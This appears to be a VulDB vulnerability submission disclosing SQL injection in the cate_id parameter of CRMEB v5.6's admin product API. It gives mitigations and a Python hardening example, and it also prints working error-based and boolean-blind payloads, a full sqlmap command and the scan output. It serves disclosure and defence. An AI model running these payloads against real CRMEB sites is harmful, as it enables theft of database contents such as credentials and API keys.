| Title | CRMEB CRMEB e-commerce system v5.6 Vulnerability type: SQL Injection |
|---|
| Description | Title: SQL Injection in /adminapi/product/product — vulnerable cate_id parameter
The /adminapi/product/product endpoint in CRMEB v5.6 is vulnerable to SQL injection via the cate_id GET parameter. Unsanitized input is injected directly into SQL queries, allowing an attacker to manipulate the query logic. Automated testing with sqlmap confirmed the issue and identified both boolean-based blind and error-based injection techniques (backend DBMS fingerprinted as MySQL ≥ 5.6). Error-based vectors (e.g. functions that cause XPath/GTID errors) can be used to obtain direct database value leakage, and boolean/time-based techniques can be used when error output is suppressed.
Reproduction (summary):
1. Send a crafted GET request to /adminapi/product/product with a manipulated cate_id parameter.
2. The application returns SQL errors or exhibits boolean/time-based behaviour differences, demonstrating that user input reaches SQL execution.
Example indicative payloads (for verification only): a probe that produces a syntax error (cate_id=%E9%8E%88%27%22%5C%28) and MySQL error-based payloads (e.g. AND updatexml(1,concat(0x7e,(select database()),0x7e),1)) have been observed to produce exploitable responses. sqlmap automated testing confirmed cate_id as injectable and logged the findings.
Impact:
Successful exploitation can disclose sensitive database contents (database names, table names, rows such as user credentials, API keys, configuration data), and may lead to data exfiltration or further pivoting inside the application. The presence of both error- and boolean-based vectors increases exploitability and flexibility for an attacker.
Recommended mitigation:
• Treat cate_id as a numeric parameter server-side: validate and coerce it to an integer (reject non-numeric input).
• Use parameterized queries / prepared statements for all database access, and avoid string concatenation for SQL.
• Disable detailed SQL error messages in production responses; log errors internally instead.
• Apply least-privilege access for the database account and enforce strict access controls on admin APIs.
• Deploy input sanitization and WAF rules to block obvious SQL injection patterns and monitor for anomalous queries.
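The first two mitigations worked through in Python, as an added example that is neither CRMEB's code nor part of the advisory: an integer coercion for cate_id that rejects each of the cate_id values seen in the probes and sqlmap log above (boolean-based RLIKE, error-based GTID_SUBSET and the syntax-error probe) while accepting the legitimate value, shown next to the concatenation pattern that lets such input reach the statement text and a parameterized lookup that binds the validated integer instead. The product table, its columns and the sample rows are assumptions, not CRMEB's schema.

```python
import re
import sqlite3
from urllib.parse import parse_qs, unquote

# Constructed sample inputs: the cate_id values that appear in the advisory's probes and sqlmap log.
OBSERVED_CATE_IDS = [
    "1",                                                                  # legitimate value
    "1 RLIKE (SELECT (CASE WHEN (1039=1039) THEN 1 ELSE 0x28 END))",      # boolean-based blind
    "GTID_SUBSET(CONCAT(0x7170787671,(SELECT (ELT(5044=5044,1))),0x716a7a7071),5044)",  # error-based
    unquote("%E9%8E%88%27%22%5C%28"),                                     # syntax-error probe
]

CATE_ID_RE = re.compile(r"[0-9]{1,10}")

def validate_cate_id(raw: str) -> int:
    """Coerce cate_id to an integer; anything but a plain decimal number is rejected."""
    if not CATE_ID_RE.fullmatch(raw):
        raise ValueError(f"cate_id must be an integer, got {raw!r}")
    return int(raw)

def vulnerable_sql(raw: str) -> str:
    """The vulnerable pattern: the raw parameter becomes part of the statement text (never executed here)."""
    return "SELECT id, store_name FROM product WHERE cate_id = " + raw

def safe_lookup(conn: sqlite3.Connection, raw: str) -> list:
    """Hardened path: validate first, then bind the integer as a parameter, never as SQL text."""
    cate_id = validate_cate_id(raw)
    sql = "SELECT id, store_name FROM product WHERE cate_id = ? ORDER BY id"
    return conn.execute(sql, (cate_id,)).fetchall()

def cate_id_from_query_string(qs: str):
    """Validated cate_id from a request query string, or None if it is absent, repeated or malformed."""
    values = parse_qs(qs).get("cate_id", [])
    if len(values) != 1:
        return None
    try:
        return validate_cate_id(values[0])
    except ValueError:
        return None

def demo_connection() -> sqlite3.Connection:
    """In-memory stand-in for the product table (assumed schema, constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER, store_name TEXT, cate_id INTEGER)")
    conn.executemany("INSERT INTO product VALUES (?, ?, ?)",
                     [(1, "tea", 1), (2, "cup", 1), (3, "kettle", 2)])
    return conn

if __name__ == "__main__":
    print(safe_lookup(demo_connection(), OBSERVED_CATE_IDS[0]))
```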
sqlmap command:
sqlmap -u "http://xxxxx/adminapi/product/product?cate_id=1&is_gift=&limit=15&logistics=&page=1&price_s%5B%5D=&price_s%5B%5D=&sales_s%5B%5D=&sales_s%5B%5D=&spec_type=&stock_s%5B%5D=&stock_s%5B%5D=&store_name=&time=&type=1&vip_product=&virtual_type=" -p cate_id --headers="Authori-Zation: Bearer eyJ0xxxx\nCookie: PHPSESSID=xxxx; cb_lang=zh-cn" --batch --level=3 --risk=2 --threads=2 --timeout=10 --random-agent --dbms=mysql
Output of the sqlmap run:
GET parameter 'cate_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 649 HTTP(s) requests:
---
Parameter: cate_id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cate_id=1 RLIKE (SELECT (CASE WHEN (1039=1039) THEN 1 ELSE 0x28 END))&is_gift=&limit=15&logistics=&page=1&price_s[]=&price_s[]=&sales_s[]=&sales_s[]=&spec_type=&stock_s[]=&stock_s[]=&store_name=&time=&type=1&vip_product=&virtual_type=
Type: error-based
Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
Payload: cate_id=GTID_SUBSET(CONCAT(0x7170787671,(SELECT (ELT(5044=5044,1))),0x716a7a7071),5044)&is_gift=&limit=15&logistics=&page=1&price_s[]=&price_s[]=&sales_s[]=&sales_s[]=&spec_type=&stock_s[]=&stock_s[]=&store_name=&time=&type=1&vip_product=&virtual_type=
---
[09:19:14] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.6
[09:19:16] [INFO] fetched data logged to text files under '/Users/xxxx/.local/share/sqlmap/output/xxxxx'
[*] ending @ 09:19:16 /2025-09-22/ |
|---|
| Source | https://github.com/coolcj-stack/CRMEB-V5.6-SQL-Injection/blob/main/README.md |
|---|
| User | BlackSpdier (UID 89912) |
|---|
| Submission | 09/22/2025 03:58 |
|---|
| Moderation | 10/04/2025 13:30 (12 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 327046 [CRMEB up to 5.6 GET Parameter product cate_id sql injection] |
|---|
| Points | 20 |
|---|